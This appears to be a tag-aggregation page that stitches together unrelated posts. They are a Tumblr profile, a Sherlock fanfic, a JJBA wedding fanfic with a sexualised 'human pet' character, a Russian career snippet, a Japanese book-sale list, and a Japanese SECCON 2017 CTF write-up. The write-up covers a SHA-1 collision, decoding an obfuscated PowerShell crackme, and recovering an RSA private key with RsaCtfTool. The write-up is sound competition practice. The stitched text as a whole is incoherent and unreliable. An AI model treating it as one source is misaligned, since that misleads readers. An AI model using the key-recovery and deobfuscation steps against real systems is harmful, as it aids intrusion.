//Another beautiful sleeve art commission from SinScare

These will be used for my SecCon deck then later for the EX6 angels deck.

5 seccons into my face reveal and I already got a message form a porn blog

hey u guys wanna see something werid

wghatch him for a seccon d yeah yeah

☆ Pinned ☆

since I’m posting here now apparently

[pictured above: me and the tumblrinas in different timezones reblogging the same art on the dash over and over]

About me:

You can call me um ummm uhhhh

I’m an adult

Fixated on JJBA part 5 rn but I have been on this site for a long time in many-a-fandom—none of which are ever truly retired

i dabble in fanart archiving @secconator @bruno-giorno @thedoppiozone very informally on these sideblogs if u have any interest in seeing that

this tumblr was my first blog created but I have at least 3 other main blogs with their own sideblogs so… I come and go like a divorced father visiting several ex families

I’m not “proship” or “anti-anti” or whatever the hell people are saying these days but I may engage in some works that are uncomfortable or problematic to you for various reasons (i.e. soushin, giomis, Rick & Morty) but i also don’t really care to explain why I engage with them. If you see anything on my blogs that upset you, but wish to continue following, feel free to send me a dm or an ask and I will tag those posts accordingly so you can block them

maaaajor tag yapper. not super chatty outside of that

lover of Hope

lover of musics

user of tone tags

Art tags/navigation tags below.

First of all this is absolutly amazing and beautifull!

Seccon I understand that Mycroft can and likely has some "experince" buuut

I'd love to picture him getting all ready at the Diogenes just to come to a complete stop and start to panic right away as it dawns on him what exactly he had texted and what that means, yes he could picture it and fantasize about but he actually never had DONE that! And oh god Gregory could be here any minute, that is not enough time to research, what research? His mind Will helpfully add. You do know, just only in theory.

Cue one, to Mycroft, dashing lookinf DI coming in and finding him in this state.

Do You Like Me?

Mycroft Holmes looked at the paper he pulled out of his pocket in utter confusion.

He knew what it was: three-holed, loose-leaf paper. The type of paper every school-aged child was familiar with. He felt an odd sense of nostalgia simply holding the paper with its college-ruled lines. His brain began to swim with deductions:

Carefully halved -its smooth torn edge telling him the person likely used a ruler to do so.

Folded to create a square.

Wrinkled as if having been balled up to be binned but then smoothed out again.

All of that, while its own level of bafflement, was not as dumbfounding as what was written inside.

It's Valentine's Day. I like you. Do you like me?  Yes ⬜ No ⬜

It was evident the giver started on this quaint, middle-school note-writing path, realized the ridiculousness of giving him of all people such a thing, and was going to throw it away, but then changed their mind and slipped him the note anyway.

It was unsigned but Mycroft recognized the writing and could hear the voice of its author in his mind.

He has not seen him in nearly a week. How? Why NOW?

Then he recalled a conversation from a year ago.

It was the week of Valentine's Day. He and Gregory Lestrade had met for their monthly Sherlock update, which stopped being about Sherlock long ago. Gregory was recalling how he felt when, as a spotty young teen, he slipped such a note to a girl he liked but forgot to sign it. The girl in question presumed it was from another classmate that she fancied and approached him with it. The classmate, seizing the opportunity, claimed the note was his. By the time Gregory realized what had happened, he was too heartbroken and ashamed to say anything. He had not sent a Valentine again until he was married, and they both knew what happened there. Mycroft was just coming to terms with realizing he had fallen in love with Gregory and convinced himself Gregory would not be interested in him. Thus, kept his feelings to himself. He could not admit then that he would have never made that mistake were Gregory to send him such, and he would have checked off Yes. Instead, Mycroft casually mentioned he had started uni by then. Not that he thought of such things then, but he was much too young for his intellectual peers. And that same intellect had cut him off from what should be his social peers. He had not said the words, but he knew Gregory understood it meant he had never sent nor received such a thing. So, in true Mycroft fashion, he blew the whole conversation off in fierce snark about the sentiment surrounding the time of year and quickly changed the subject.

Now, a year later, Mycroft stared at the paper in his hands.

He was grateful none could see how his heart lurched, for surely could not hide his wonder.

Here he was, a grown man, a near middle-aged man at that! -receiving his very first Valentine!

For a little piece of paper, it carried a lot of weight. One he never expected to bear.

And it's from Gregory!

The enormity of what it meant! That Gregory, who would never toy with him on such a thing knowing who he is, has done this?

Could it really be that simple? To have everything by answering a Valentine?

The thought utterly gutted Mycroft.

Mycroft was not a man for romantic overtures; he simply was not. Still, he knew he had to do something.  There are only two people who could get close enough to him to deliver such and he has not seen his brother in days.

"Anthea?"

"Sir?"

Mycroft held out the note. "Please reverse the travel of today's delivery."

Anthea barely suppressed her smirk as she slipped the note into a pocket without looking at it. "Yes, sir."

Mycroft gave it two hours.

Ninety-three minutes later, his phone buzzed.

TEXT: This is faster. She or whoever was sent is good. I just found it in my pocket. –GL

It was a photo of the original note, now with Mycroft’s response added, plus another text.

It's Valentine's Day. I like you. Do you like me?  Yes ✔ No ⬜ It is MORE than like. YES ✔  

TEXT: If you could have 24 hours with me and I couldn't say no, what would we be doing? –GL

Mycroft nearly dropped his phone as far too many visuals, clean and… otherwise, suddenly crashed in his mind.

It was heady to realize what he once never dared to dream could be on the verge of becoming reality.

TEXT: Be my Valentine and find out. I’m at Diogenes. The clock will begin upon arrival. Come and kiss me. –MH

TEXT: I’ll be there in an hour, depending on traffic. –GL

“Anthea?”

“Shall I clear your schedules for today, Sir?”

Mycroft could not find it in him to even pretend annoyance at her presumptuousness; she was his aide-de-camp for a reason.

“Today and tomorrow,” he looked at his phone, “Actually -hold that thought…”

Emboldened, Mycroft sent another text.

TEXT: Can you be enticed to double the time if you’ll allow me to reverse the order? –MH

He mentally grinned at the thought of Gregory's face upon reading it. 

TEXT: Consider me enticed. I’ll be there in LESS an hour! –GL

Mycroft’s eyes playfully narrowed on a smug-looking Anthea. “Make that today, tomorrow, and the day after.”

“Of course, sir.”

=========================

Read/Comment on AO3

@flashfictionfridayofficial @mystradepromptsandscenarios @fluffbruary

Мысли из Линкадина — 11

Изображение с unsplash.com, автор William Felipe Seccon О молчании и говорении В начале жизни нас учат ходить и говорить, но потом отправляют в школу, где требуется сидеть и молчать. Потом (если повезёт с вузом), опять надо ходить и говорить. Потом, на стартовой должности, снова сидеть и молчать. Потом тебе неполные сорок, ты вроде как эксперт, тебя снова просят говорить, но уже не очень…

View On WordPress

i got up from my chair and my leg just decided not to work? it wasnt even like i had low iron levels or something like that it just flat out could not support anything so cut to me laying on the ground really confused as to just what happened

self indulgence, pt 20

a/n: heres my first ever finished series!! fuck this has been a ride, but im glad to have done it with all of you.

warnings: weddings, crying, pregnancy mentions

The planning for your wedding passed in a blur. It would be in Sicily, in Risotto’s hometown, and in the church he had gone to growing up. His family thought he was dead, and he knew it was best to keep it that way.

Your honeymoon would be in Malta, and it would be only a week. Risotto didn’t trust his subordinates to run the newly fledging organization for longer than that. 

An increasingly obvious problem was Secco. The man had grown more and more attached to you as the days went on, and he now had a hard time being separated from you. He did wear clothes now, usually shorts and a loose t shirt, but he still had the unfortunate habit of coming to you when he was horny. 

Secco was a unique issue, and one you needed to confront. He was a grown man who acted like a particularly obedient pet, who clearly had issues that couldn’t be resolved easily, and who was a very powerful and loyal Stand user. 

Risotto would rather Secco remained attached to you than have to kill him, but he’d made it clear in no uncertain terms that Secco was not to come on the honeymoon. You agreed. You’d have to find someone who liked him. 

Your solution came when you were trying to order the invitations. Your computer kicked the bucket just as you were finishing. Fortunately, Melone was in town, and he agreed to come over and help. The moment he stepped in the door, Secco was on him like an overeager dog. Melone frowned. “And who’s this?”

You sighed. “Secco, stop! He’s Cioccolata’s former human pet. I transferred his loyalties.”

Melone swallowed. “Your Stand is very…interesting.”

You laughed. “You can say scary.”

He shrugged and leaned down to pat Secco’s head. “He’s very cute.”

Secco purred and looked pleased. “Thank you!”

Melone jumped. “Oh, you talk!”

Secco’s voice was less garbled now, since you’d worked with him on speech. Melone knelt and looked at Secco. “Do you like it here?”

Secco grinned. “I love it here. Y/N and Risotto aren’t mean to me, and they aren’t weak like Cioccolata was. And Y/N is so pretty-”

He blushed and looked down. Melone chuckled softly and stood. “He’s an interesting project, to say the least.”

You sighed. “Yeah. My issue is that he can’t exactly come on the honeymoon with us.”

Melone shrugged. “I’ll keep him.”

You blinked. “Really?”

He raised an eyebrow. “A human pet? I’d love to talk more with him.”

You shrugged. “Secco, do you want to go with Melone for a week?”

Seccon grinned. “He seems nice! Yeah.”

You shrugged again. “Okay, well, he’ll take you to his apartment after he’s done here, so go and get your things.”

Secco bounded into your room. You sat next to Melone on the couch, and he pulled up a mockup of your wedding invitations. “I knew something like this would happen, so I saved duplicates of everything on Babyface.”

You hugged him. “Thank you so much.”

He shrugged and hit a few keys, sending them to the company you were getting them from. “It’s not a problem.”

He hugged you back and smiled. “I’m happy you and Risotto are finally tying the knot.”

You pulled away and smiled back. “I am too.”

He stood, and Secco came out of your room, holding his bag. It had his changes of clothes and his toiletries, both of which you had gotten for him. Getting him to take a bath at first had been hell, but he’d eventually grown to like it. 

Melone took his hand. “I’ll take good care of him, Y/N.”

You smiled and knelt to kiss Secco’s forehead. “Be good for Melone.”

He hugged you tight and nodded. “I will.”

You hugged him back, then let go and stood. Melone nodded to you and led Secco out the door. Secco was walking normally, although it was a little bowlegged. 

You sat back down at your desk, glad that at least one of the knots in your life had been untangled. 

RIsotto came home late, looking tired. You were on the couch, typing on your laptop. When you saw him, you put it down and reached out. He pulled off his tie and fell onto your lap, groaning. “They’re so fucking stupid.”

You stroked his hair gently. “What happened?”

He shook his head. “They’ll never survive without me.”

He turned over and looked up at you. “They’re barely making it without you. With both of us gone, this whole operation might just go under.”

You sighed. “Prosciutto?”

Risotto bit his lip. “Has his hands full containing the leak. Formaggio would be able to hold it down for a few days, and with Illuso, probably a full week.”

You shrugged. “So we have some extra work at the end of the day. Not a bad thing.”

He shrugged back and stayed quiet. You kept scratching his hair, and he hummed. You smiled. “Do you want to watch a movie?”

He nodded, yawning again. You patted his head. “Go put on pajamas. You’ll wrinkle your suit.”

He rolled his eyes, and got up. “The suit isn’t even that expensive-”

You shook your head. “I like it, I don’t want it to get wrinkled.”

He stuck his tongue out playfully, and you smiled. 

You turned on the TV while he changed. You glanced into your shared room. He was down to his briefs, stretching out tired muscles. He smiled at you, and you smiled back. He pulled on a baggy tshirt and came out. “Hey.”

You held out your arms, and he laid down on you. His feet were hanging off the end of the couch, but he didn’t care.

The day of your wedding came faster than you’d expected. Risotto had stayed over at Formaggio’s place the night before, so tradition could be kept. A team of Passione aestheticians had come over early in the morning and made you up and laced you into the dress.  You sat in a chair and looked at yourself as they contoured and colored your face. The makeup was soft. You swallowed the nervousness in your throat. You were the queen, and they knew it. What had you done to get there? What would you do to stay there?

The church you were getting married in was massive. All of Passione was in attendance for the ceremony, but only a select few would be present for the reception, mostly the former members of La Squadra di Esecuzione and their new spouses or underlings. Bruno’s squad would be there as well, even Mista. Risotto had refused to budge on ordering him to attend. The final nail in his coffin, watching the woman you love become inaccessible forever. 

You were prepared to walk down the aisle alone. But when Prosciutto met you at the door and offered his arm, you were grateful. He kissed your cheek gently. “You look beautiful.”

You smiled at him. “Thank you.”

He nodded. “I know I have to give you away to him.”

You touched his cheek. Your heels made you taller than him. “We’re friends.”

He closed his eyes. “Yes.”

The music started, and the doors opened.

The church was beautiful, festooned in lace and white roses. The sun shone through green, white and blue stained glass, and the ceiling was high and airy.  Your train trailed behind you as you walked down the aisle with Prosciutto. 

Risotto was standing at the altar, looking angry as usual. His tuxedo was black from the skin out. The only break was his white tie. He turned to you, and his facade broke. 

His face crumpled, and he covered his face as he began to cry. You rushed the last few steps and took his wrists. “Ris, what-?”

The church was stunned. Nobody had ever seen him cry before. He pulled his hands away from his face and wiped away his tears. “Fuck. You’re beautiful. I never thought-”

You smiled weakly. “If you cry, I’ll cry. Quit it.”

He nodded and inhaled deeply. His black sclera never revealed that he’d been crying. The priest cleared his throat. “Are we ready?”

You nodded and took Risotto’s hands. The priest began. “Dearly beloved-”

You zoned out and watched Risotto’s face. He was smiling at you. He looked utterly content. You both repeated after the priest, and after your “I do’s”, he stepped back. “The couple will now state their vows to one another before God.”

Risotto swallowed hard and pulled out a stack of notecards. He blinked and looked at you. “Y/N. You are the woman I love. When I found you, I hoped against hope that someday we would be here, and I, against all odds, and all evidence to the contrary, have finally gotten something I want. Someone I want. You have risked your life to get us where we are now, but that stops here. I will keep you safe. I will make a home for you, wherever that may be.”

He swallowed hard and continued. “As I stand here, under the eyes of God and Passione, I know that I chose right. I chose you, and I will keep choosing you.”

You sniffled, and Prosciutto at your elbow handed you a handkerchief. You took Risotto’s hands. “Risotto Nero, you have been the only constant in my life for a long time. I have loved you for longer than I know, and I feel blessed every day that I’m by your side. You make me laugh and cry, rage and smile. I have risked my life for yours, as you do for mine. I would do it again in a heartbeat. You are the only man I would do this for. I chose you. I will keep choosing you.”

The priest spoke softly, but the whole church heard it. “You may now kiss the bride.”

Risotto’s lips were on your before the priest finished his sentence. You could taste salt and blood, tears and iron. His lips were crushing and desperate, his hands pulling you in close to him passionately. 

He pulled back, panting softly, and you smiled at him. “You have lipstick marks.”

He laughed and pulled away, taking your hand in his and facing the church. The priest announced, “I present to you today, under God for the first time, Mr. and Mrs. Risotto Nero.”

Epilogue.

Of course it didn’t end there. Risotto rose in power and fame, eventually controlling all of Italy in his web of organized crime. He became known as “L’uomo Nero”, fitting both because of his last name and his fashion sense, as well as his sadistic taste in punishment. He was feared and respected. He never allowed anyone else to dole out punishment, and ruled with an iron fist.

Your powers, as soft as they seemed, were more feared among the organization. Rumors of you making men fall in love with a touch, then leading them into the jaws of L’uomo Nero, circulated long after you both retired. 

When Risotto turned 35, he decided he’d had enough. You retired with him to a small villa on a hill in Sicily, overlooking the beach. You stopped taking birth control, and were pregnant with twins within the year. They were born as white-haired as their father. Risotto doted on them, and on you.

You found him one day staring into the mirror at his body. When you had met him, ten years ago now, he had been slim and tall, like a tree. As he neared middle age, his body had thickened and gained muscle and fat. His belly stuck out over his shorts, and body hair had thickened on his chest and stomach. He’d raised an eyebrow at you, and you’d kissed him. He’d sighed. “I’m not the same man you married.”

You’d laughed. “I’m not the same woman. Does that mean we give up? Does that mean I don’t love you every day?”

He smiled and kissed you again. “No. It doesn’t.”

You were pregnant again the next year. Risotto’s love for you grew as his children did, and when you became pregnant again with twins, he decided it was time for a vasectomy. You agreed. 

You grew old together, watching your children play in the waves.

SECCON 2017 Online

12/9-10の24時間、SECCONオンライン予選がありました。海外勢も含め計1028チームが参加していたようです。結果は53位でした。国内チームのなかでは12位なので、2月に開催される国内決勝大会へ進めそうです。

putchar music - Programming 100

問題文はつぎのとおり。

This one line of C program works on Linux Desktop. What is this movie's title? Please answer the flag as SECCON{MOVIES_TITLE}, replace all alphabets with capital letters, and spaces with underscores.

main(t,i,j){unsigned char p[]="###>5|(int)(t*x));}}

与えられたソースをコンパイルします。include文を追加して、-lm オプションを付けてコンパイル。

#include #include

main(t,i,j){unsigned char p[]="###>5|(int)(t*x));}}

$ gcc a.c -lm

実行すると標準出力に大量のデータが流れてきます。これを再生すると映画の音楽が流れてきます。PCの環境によって音が鳴ったり鳴らなかったり？

$ a.out | aplay 再生中 raw データ 'stdin' : Unsigned 8 bit, レート 8000 Hz, モノラル

flagは SECCON{STAR_WARS}

SHA-1 is dead - Crypto 100

問題文はつぎのとおり。

SHA-1 is dead

http://sha1.pwn.seccon.jp/ Upload two files satisfy following conditions:

file1 != file2 SHA1(file1) == SHA1(file2) SHA256(file1) SHA256(file2) 2017KiB 2017KiB

1KiB = 1024 bytes

SHA1衝突が発生する2つのファイルを作成するようです。 SHA1といえば、ハッシュ衝突するファイルが実際に生成されたと話題になった件ですね。

https://shattered.io/

SHA1が衝突するファイルは既にあるので、あとはファイルサイズの条件を満たせばOK。 ハッシュ値計算の仕組みから、ハッシュ値が同じ2つのファイルに同じデータを追記した場合、追記後のファイルのハッシュは再び一致するはず。 上記サイトから衝突が発生した2つのPDFファイルをダウンロードします。

-rwxrwxrwx 1 root root 422435 12月 9 17:12 shattered-1.pdf -rwxrwxrwx 1 root root 422435 12月 9 17:12 shattered-2.pdf

2017KiBより大きく2018KiBより小さいファイルが欲しいのでサイズを計算する。

422435 bytes / 1024 = 412 KiB (shattered.ioのPDFファイルサイズ) 2017 KiB - 412 KiB = 1605 KiB (追記すべきデータのサイズ)

あとは適当なダミーデータをPDFに追記するだけ。

$ python -c "print '\xff'*1024*1605" > ff $ cat shattered-1.pdf ff > 1.pdf $ cat shattered-2.pdf ff > 2.pdf

$ ls -lrt 合計 6468 -rwxrwxrwx 1 root root 422435 12月 9 17:12 shattered-1.pdf -rwxrwxrwx 1 root root 422435 12月 9 17:12 shattered-2.pdf -rwxrwxrwx 1 root root 1643521 12月 9 17:24 ff -rwxrwxrwx 1 root root 2065956 12月 9 17:24 1.pdf -rwxrwxrwx 1 root root 2065956 12月 9 17:25 2.pdf

$ sha1sum 1.pdf 2.pdf 82a7ab1ec5d028f3956b6fe92c8ed594bfb41d92 1.pdf 82a7ab1ec5d028f3956b6fe92c8ed594bfb41d92 2.pdf

$ sha256sum 1.pdf 2.pdf f240399f72872cccc4e24fd91431bc604b5668cf7ba7e6a1ee35ad58edd43f40 1.pdf 89873267dd5f3da340e1304409aecfc1bcbd89e5428192834f6f1cc7a6902a11 2.pdf

SHA1が衝突する2つのファイルが得られました。これを問題サイトにサブミットして終了。 flagは SECCON{SHA-1_1995-2017?}

Powerful_Shell - Binary 300

問題文はつぎのとおり。

Crack me. powerful_shell.ps1-1fb3af91eafdbebf3b3efa3b84fcc10cfca21ab53db15c98797b500c739b0024

与えられたファイルはこんな感じ。Power Shellのスクリプトが難読化されている？

$ECCON=""; $ECCON+=[char](3783/291); $ECCON+=[char](6690/669); $ECCON+=[char](776-740); $ECCON+=[char](381-312); $ECCON+=[char](403-289); $ECCON+=[char](-301+415); $ECCON+=[char](143-32); $ECCON+=[char](93594/821); $ECCON+=[char](626-561); $ECCON+=[char](86427/873); $ECCON+=[char](112752/972); $ECCON+=[char](43680/416); $ECCON+=[char](95127/857);

(省略)

$ECCON+=[char](873-863); $ECCON+=[char](721-708); $ECCON+=[char](803-793); $ECCON+=[char](10426/802); Write-Progress -Activity "Extracting Script" -status "20040" -percentComplete 99; $ECCON+=[char](520-510); Write-Progress -Completed -Activity "Extracting Script";.([ScriptBlock]::Create($ECCON))

Windowsのデフォルトだとスクリプト実行がポリシーで制限されている。まずはスクリプトを実行可能にするために、PowerShellを管理者権限で起動して以下のコマンドを実行する。

PS C:\work> Set-ExecutionPolicy RemoteSigned

スクリプト実行するとSECCONの画像が表示されるが何かのチェックで終了している模様。

難読化されているといっても所詮はスクリプトなので最後のほうでeval的なことをしているのではと思う。 それらしいところを探して、デコードされて読みやすくなった状態のコード(があるはずと想定して)を出力してみる。

最後の行を変更してファイル出力

(変更前) Write-Progress -Completed -Activity "Extracting Script";.([ScriptBlock]::Create($ECCON))

(変更後) Write-Progress -Completed -Activity "Extracting Script";[ScriptBlock]::Create($ECCON)|Out-File -FilePath C:\work\output.ps1 -Encoding Ascii

再度実行すると、デコードされたスクリプトが得られる。ちなみにこのスクリプト、デバッガによる実行を検知すると終了するようになっている。

PS C:\work> .\powerful_shell.ps1

といってもまだ難読化されているのだが。 シンタックスエラーがあるので改行コードを若干修正すると実行できる。 また、処理中に実行環境のチェックをしているのでその部分をスキップして実行するとピアノの鍵盤が。実際に音もなるらしい？(自分の環境ではうまくならなかった)

処理の後半では、正しいキー入力(ピアノ演奏)を基に生成した鍵を使って、XORでデータ復号している。

(省略)

$text=@" YkwRUxVXQ05DQ1NOE1sVVU4TUxdTThBBFVdDTUwTURVTThMqFldDQUwdUxVRTBNEFVdAQUwRUxtT TBEzFVdDQU8RUxdTbEwTNxVVQUNOEFEVUUwdQBVXQ0NOE1EWUUwRQRtVQ0FME1EVUU8RThdVTUNM EVMVUUwRFxdVQUNCE1MXU2JOE0gWV0oxSk1KTEIoExdBSDBOE0MVO0NKTkAoERVDSTFKThNNFUwR FBVINUFJTkAqExtBSjFKTBEoF08RVRdKO0NKTldKMUwRQBc1QUo7SlNgTBNRFVdJSEZCSkJAKBEV QUgzSE8RQxdMHTMVSDVDSExCKxEVQ0o9SkwRQxVOE0IWSDVBSkJAKBEVQUgzThBXFTdDRExAKhMV Q0oxTxEzFzVNSkxVSjNOE0EWN0NITE4oExdBSjFMEUUXNUNTbEwTURVVSExCKxEVQ0o9SkwRQxVO EzEWSDVBSkJAKBEVQUgzThAxFTdDREwTURVKMUpOECoVThNPFUo3U0pOE0gWThNEFUITQBdDTBFK F08RQBdMHRQVQUwTSBVOEEIVThNPFUNOE0oXTBFDF0wRQRtDTBFKFU4TQxZOExYVTUwTSBVMEUEX TxFOF0NCE0oXTBNCFU4QQRVBTB1KFU4TThdMESsXQ04TRBVMEUMVThNXFk4TQRVNTBNIFUwRFBdP

(省略)

E0QVTUwTSBVMEUYXTxFAF0NCE0oXTBNCFU4QFhVBTB1KFU4TQBdMEUIXQ04TRBVMEUAVThNDFkFM EUobTBNDFUwRFBdAThNIFUITQRdME0wVQU8RShdMHUMVThMoF0wRNhdDThNEFUwRRhVOEzEWQUwR ShtME0EVTBFGF0BOE0gVQhNDF0wTVxVBTxFKF0wdQxVOEygXTBE2FxROE10VShZOTBFTF2E= "@

$plain=@() $byteString = [System.Convert]::FromBase64String($text) $xordData = $(for ($i = 0; $i -lt $byteString.length; ) { for ($j = 0; $j -lt $f.length; $j++) { $plain+=$byteString[$i] -bxor $f[$j] $i++ if ($i -ge $byteString.Length) { $j = $f.length } } }) iex([System.Text.Encoding]::ASCII.GetString($plain))

キーストローク入力を照合しているコード部分を読んで鍵を特定する。

$f="hhjhhjhjkjhjhf"

さらに、復号後のデータをファイル出力するようにスクリプトを修正して実行。

(変更前) iex([System.Text.Encoding]::ASCII.GetString($plain))

(変更後) [System.Text.Encoding]::ASCII.GetString($plain)|Out-File -FilePath C:\work\output3.ps1 -Encoding Ascii

そうして得られた復号後のスクリプトはまだ難読化されてる。。。変数名が記号になっているのでややこしい。

${;}=+$();${=}=${;};${+}=++${;};${@}=++${;};${.}=++${;};${[}=++${;}; ${]}=++${;};${(}=++${;};${)}=++${;};${&}=++${;};${|}=++${;}; ${"}="["+"$(@{})"[${)}]+"$(@{})"["${}${|}"]"$(@{})"["${@}\({}"]+"\)?"[${+}]+"]"; ${;}"".("$(@{})"["${}${[}"]"$(@{})"["${}${(}"]"$(@{})"[${}]+"$(@{})"[${[}]+"$?"[${+}]+"$(@{})"[${.}]); ${;}"$(@{})"["${}${[}"]"$(@{})"[${[}]+"${;}"["${@}${)}"];"${"}${.}${(}+${"}${ (省略)

また最後の行に着目して、デコード後のスクリプトを出力する。

(変更前) ${;}="$(@{})"["${}${[}"]"$(@{})"[${[}]+"${;}"["${@}${)}"];"${"}${.}${(}+${"}${ (省略)

(変更後) ${;}="$(@{})"["${}${[}"]"$(@{})"[${[}]+"${;}"["${@}${)}"]; Write-Host "${"}${.}${(}+\({"}\)

出力結果はこちら。またまた難読化されてる。

[CHar]36+[CHar]69+[CHar]67+[CHar]67+[CHar]79+[CHar]78+[CHar]61+[CHar]82+[CHar]101+[CHar]97+[CHar]100+[CHar]45+[CHar]72+[CHar]111+[CHar]115+[CHar]116+[CHar]32+[CHar]45+[CHar]80+[CHar]114+[CHar]111+[CHar]109+[CHar]112+[CHar]116+[CHar]32+[CHar]39+[CHar]69+[CHar]110+[CHar]116+[CHar]101+[CHar]114+[CHar]32+[CHar]116+[CHar]104+[CHar]101+[CHar]32+[CHar]112+[CHar]97+[CHar]115+[CHar]115+[CHar]119+[CHar]111+[CHar]114+[CHar]100+[CHar]39+[CHar]13+[CHar]10+[CHar]73+[CHar]102+[CHar]40+[CHar]36+[CHar]69+[CHar]67+[CHar]67+[CHar]79+[CHar]78+[CHar]32+[CHar]45+[CHar]101+[CHar]113+[CHar]32+[CHar]39+[CHar]80+[CHar]48+[CHar]119+[CHar]69+[CHar]114+[CHar]36+[CHar]72+[CHar]51+[CHar]49+[CHar]49+[CHar]39+[CHar]41+[CHar]123+[CHar]13+[CHar]10+[CHar]9+[CHar]87+[CHar]114+[CHar]105+[CHar]116+[CHar]101+[CHar]45+[CHar]72+[CHar]111+[CHar]115+[CHar]116+[CHar]32+[CHar]39+[CHar]71+[CHar]111+[CHar]111+[CHar]100+[CHar]32+[CHar]74+[CHar]111+[CHar]98+[CHar]33+[CHar]39+[CHar]59+[CHar]13+[CHar]10+[CHar]9+[CHar]87+[CHar]114+[CHar]105+[CHar]116+[CHar]101+[CHar]45+[CHar]72+[CHar]111+[CHar]115+[CHar]116+[CHar]32+[CHar]34+[CHar]83+[CHar]69+[CHar]67+[CHar]67+[CHar]79+[CHar]78+[CHar]123+[CHar]36+[CHar]69+[CHar]67+[CHar]67+[CHar]79+[CHar]78+[CHar]125+[CHar]34+[CHar]13+[CHar]10+[CHar]125|iex

再度、最後の箇所で難読化解除後のスクリプトを出力するよう変更。

実行して得られた結果がこちら。ようやくゴール！

$ECCON=Read-Host -Prompt 'Enter the password' If($ECCON -eq 'P0wEr$H311'){ Write-Host 'Good Job!'; Write-Host "SECCON{$ECCON}" }

flagは SECCON{P0wEr$H311}

Ps and Qs - Crypto 200

問題文はつぎのとおり。

Decrypt it. psqs1-0dd2921c9fbdb738e51639801f64164dd144d0771011a1dc3d55da6fbcb0fa02.zip (pass:seccon2017)

与えられたZipファイルの中身は暗号文と公開鍵2つです。

Archive: psqs1-0dd2921c9fbdb738e51639801f64164dd144d0771011a1dc3d55da6fbcb0fa02.zip Length Date Time Name –—— -— -— ---- 512 12-09-17 01:33 cipher 800 12-09-17 01:33 pub1.pub 800 12-09-17 01:33 pub2.pub

$ openssl rsa -in pub1.pub -text -pubin Public-Key: (4096 bit) Modulus: 00:cf:cf:bb:ee:a7:df:14:3a:8a:c2:08:b1:aa:1d: 2f:86:54:5a:c4:cb:58:8c:94:a3:fb:1c:14:ad:91: a4:f0:b9:36:15:7c:5a:4b:86:9c:18:a8:b8:64:f4: (省略)

$ openssl rsa -in pub2.pub -text -pubin Public-Key: (4096 bit) Modulus: 00:bb:33:cc:7f:cc:8e:ca:f3:bf:9e:d9:5c:58:37: 92:e1:ec:6b:80:ee:87:5e:c2:06:4d:bc:f0:75:95: c8:34:49:23:bf:53:65:24:d4:e0:a7:55:74:c7:79: (省略)

暗号文ひとつに対してわざわざ公開鍵ふたつを渡しているのが気になります。と思いつつ調べているとこんなのを見つけてしまいました。

https://github.com/Ganapati/RsaCtfTool

RsaCtfTool RSA tool for ctf - uncipher data from weak public key and try to recover private key Automatic selection of best attack for the given public key

一瞬で終了、ラッキー。

$ ~/RsaCtfTool/RsaCtfTool.py –publickey "*.pub" –private > private $ openssl rsautl -decrypt -inkey private -in cipher -out plain.txt $ cat plain.txt SECCON{1234567890ABCDEF}

flagは SECCON{1234567890ABCDEF}

JPEG file - Binary 100

問題文はつぎのとおり。

Read this JPEG is broken. It will be fixed if you change somewhere by 1 bit.

ファイルが壊れていると言っているので、修復すればflagが表示されるということでしょう。

JPEG修復してくれるというツールを適当に探してきて実行しただけ。怪しげなツールだと困るので、ツール実行前にスナップショットをとっておいて後で戻しておきました。こういう時に仮想マシンは便利です。

とても楽しかったです。SECCONは毎年楽しみにしていて欠かさず参加するようにしている重要イベントです。予選突破できたのもうれしい。 運営のみなさん、チームのみなさん、まわりのいろいろな人に感謝です。ありがとうございました。

Microsoft publishes SECCON framework for securing Windows 10

Source: https://www.zdnet.com/article/microsoft-publishes-seccon-framework-for-securing-windows-10/

More info: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-security-configuration-framework/windows-security-configuration-framework

達人出版会セール

達人出版会ので半額しまくり超セールやってたので、ぜんぶみていい感じのやつのリスト作った　しかし買った本は・・・読まなければいけないッ・・・

https://tatsu-zine.com/books/

=======================================

【半額】 相関係数 

  https://tatsu-zine.com/books/correlation-coefficient

相関係数の辞典みたいなかんじか？面白そう

【半額】 RustではじめるOpenGL

https://tatsu-zine.com/books/rust-opengl

うーん、WebGLに興味があるのでまずはこっちを読んでみるのもいいかも？

プログラミング英語教本

https://tatsu-zine.com/books/programming-english-textbook

コメントとかコミットの書き方とかいつも迷う・・・

【半額】 万能コンピュータ　ライプニッツからチューリングへの道すじ

https://tatsu-zine.com/books/universal-computer

こういう本すき、他の６人はもちろん知ってるけどカントルって聞いたことない名前だ

【半額】コンピュータ理論の起源［第1巻］チューリング

https://tatsu-zine.com/books/origin-computer-theory1

これいいな～！　 第1巻しかないのか・・・　解説ついてるのうれしい　ググったらすぐ出てくるけど訳だけじゃなくて原文も載せておいてほしかった　これ紙でほしいかもしれないけど買ってから欲しかったら考えよう

ユニケージ原論

https://tatsu-zine.com/books/unicage-genron

宗教

【半額】 実践・自然言語処理シリーズ 第6巻　クチコミ分析システムの作り方

https://tatsu-zine.com/books/anlp-kuchikomi

仕事と近いような近くないような、読みたいような読みたくないような・・・

ソフトウェア・テストの技法　第2版

https://tatsu-zine.com/books/the-art-of-software-testing

紙版2006年か・・・　ちょっと古いかな

【半額】 株とPython─自作プログラムでお金儲けを目指す本

https://tatsu-zine.com/books/stock-and-python

株が趣味の親戚がいるけどいまいち話についていけないのでこれで勉強するのもおもろいかもしれない

【半額】 グラフ理論入門(原書第4版)

https://tatsu-zine.com/books/introduction-to-graph-theory-4ed

原著2018年でよさそう。三回生のときマジで金がなくて教科書買わなかったからグラフ理論の本、一冊も持ってないんだよな・・・

仕様書の読み方と書き方

https://tatsu-zine.com/books/reading-writing-specification

いつも適当に書いてるから一度くらいは本を読んでも良いのかな・・・　147ページだったらそんなに厚くないと思うし

【半額】Hugoで始める静的サイト構築入門　静的サイトジェネレーターで作る自作サイト

https://tatsu-zine.com/books/hugo-ssg

TumblerやめてHugoもいいかなあとおもってたし、2021年の本だしよさそう

【半額】 容量市場の真実　第1回入札の失敗を詳細分析

https://tatsu-zine.com/books/youryou-shijou

容量市場ってはじめて聞く単語だ

ガベージコレクションのアルゴリズムと実装

https://tatsu-zine.com/books/gcbook

安いし良さそうなんだけど翔泳社のやつもまだ読めてないんだよな

【半額】 Rust+ECSでゲーム開発 -ゲームエンジンAmethystのススメ-

https://tatsu-zine.com/books/rust-ecs-amethyst

Amethyst、rust game-devグループのやつなので何回もみたことあるけど使ったことはない。bevy-engineとかと比べてちょっとごついなと思ってハードルあったから本読んでみるとおもしろそう

【半額】 Chiselを始めたい人に読んで欲しい本

